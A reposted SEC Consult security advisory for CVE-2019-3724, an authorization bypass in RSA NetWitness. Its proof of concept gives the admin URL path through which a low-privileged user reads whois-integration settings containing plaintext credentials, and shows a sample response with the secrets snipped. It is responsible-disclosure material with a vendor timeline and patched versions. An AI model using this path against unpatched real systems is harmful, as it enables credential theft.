zoukankan      html  css  js  c++  java
  • Authorization Bypass in RSA NetWitness

    https://www.cnblogs.com/iAmSoScArEd/

    SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >
    =======================================================================
      title: Authorization Bypass
      product: RSA NetWitness
      vulnerable version: <10.6.6.1, <11.2.1.1
      fixed version: 10.6.6.1, 11.2.1.1
      CVE number: CVE-2019-3724
      impact: Medium
      homepage: https://www.rsa.com
      found: 2018-09-18
      by: Mantas Juskauskas (Office Vilnius)
      SEC Consult Vulnerability Lab

      An integrated part of SEC Consult
      Europe | Asia | North America

      https://www.sec-consult.com

    =======================================================================

    Vendor description:
    -------------------
    "RSA provides more than 30,000 customers around the world with the essential
    security capabilities to protect their most valuable assets from cyber
    threats. With RSA's award-winning products, organizations effectively detect,
    investigate, and respond to advanced attacks; confirm and manage identities;
    and ultimately, reduce IP theft, fraud, and cybercrime."

    Source: https://www.rsa.com/en-us/company/about


    Business recommendation:
    ------------------------
    By exploiting the vulnerability documented in this advisory an unauthorized
    attacker can access an administrative resource that may contain plain text
    credentials to a 3rd party system.

    The vendor provides a patch which should be installed on affected systems.


    Vulnerability overview/description:
    -----------------------------------
    The authorization mechanism provided by the platform is prone to an authorization
    bypass vulnerability, which can be easily exploited by authenticated (but low
    privileged) remote attackers for gaining access to administrative information
    including plaintext passwords.


    Proof of concept:
    -----------------
    A logged-in low privileged user (e.g. with role Analyst) is able to access
    an administrative resource by calling the following URL:

    https://[host]/admin/system/whois/properties

    After the above URL is accessed, the server returns the following HTTP response
    that contains sensitive information to a 3rd party whois service including
    plaintext passwords:

    HTTP/1.1 200 OK
    Server: nginx
    Date: [snip]
    Content-Type: application/json;charset=UTF-8
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Thu, 01 Jan 1970 00:00:00 GMT
    X-Content-Type-Options: nosniff
    Strict-Transport-Security: max-age=31536000 ; includeSubDomains
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: [snip]
    Content-Length: 795

    {"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":100000,"cacheMaxSize":50000,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":100000,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":2592000000},"cache-max-size":50000,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":60000}}}}



    Vulnerable / tested versions:
    -----------------------------
    The identified vulnerability has been verified to exist in the
    RSA NetWitness platform, version 11.1.0.1.

    According to the vendor, platform version 10 is also affected.

    The following versions are vulnerable:
    * <10.6.6.1
    * <11.2.1.1


    Vendor contact timeline:
    ------------------------
    2018-10-01: Contacting vendor through PGP via secure@dell.com
    2018-10-02: Vendor acknowledges the information was received, forwards
                the info to the relevant department
    2018-10-11: Vendor confirms the impact of the authorization issue,
                starts to work on the remediation timeline
    2018-10-15: Vendor provides additional information
    2018-10-22: Contacting vendor to provide the remediation timeline
    2018-10-23: Further email exchange related to the remediation timeline
    2019-01-18: Vendor provides an update on the fix timeline
    2019-03-05: Asking for a status update
    2019-03-06: Vendor provides a status update on the release, patch for
                platform version 11 will be released in March, version 10
                Mid-April
    2019-04-01: Asking for a specific release date & further status update
    2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change,
                they will inform us
    2019-05-06: Asking for a status update; no answer
    2019-05-09: Noticed that the new release is online fow a while now, asking
                the vendor for a status update again
    2019-05-09: Vendor: published security advisory URL and CVE
    2019-05-15: SEC Consult advisory release


    Solution:
    ---------
    The following patched versions address the identified issue:
    * 11.2.1.1
    * 10.6.6.1

    Security advisory of the vendor: https://community.rsa.com/docs/DOC-104202

    The vendor specifically told us that version 11.3 is not affected by this
    vulnerability.


    Workaround:
    -----------
    None


    Advisory URL:
    -------------
    https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    SEC Consult Vulnerability Lab

    SEC Consult
    Europe | Asia | North America

    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
    ensures the continued knowledge gain of SEC Consult in the field of network
    and application security to stay ahead of the attacker. The SEC Consult
    Vulnerability Lab supports high-quality penetration testing and the evaluation
    of new offensive and defensive technologies for our customers. Hence our
    customers obtain the most current information about vulnerabilities and valid
    recommendation about the risk profile of new technologies.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult?
    Send us your application https://www.sec-consult.com/en/career/index.html

    Interested in improving your cyber security with the experts of SEC Consult?
    Contact our local offices https://www.sec-consult.com/en/contact/index.html
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Mail: research at sec-consult dot com
    Web: https://www.sec-consult.com
    Blog: http://blog.sec-consult.com
    Twitter: https://twitter.com/sec_consult

    EOF M. Juskauskas / @2019

  • 相关阅读:
    Maven(一)之Maven入门
    由浅入深讲解数据库中Synonym的使用方法
    sql server 中查询数据库下有多少张表以及同义词等信息
    SQLServer中同义词Synonym的用法
    SQL Server在用户自定义函数(UDF)中使用临时表
    java 异常
    java算法之冒泡排序法
    如何用Java实现反转排序
    关于eclipse的注释和反注释的快捷键
    java获取随机数
  • 原文地址:https://www.cnblogs.com/iAmSoScArEd/p/10996833.html
Copyright © 2011-2022 走看看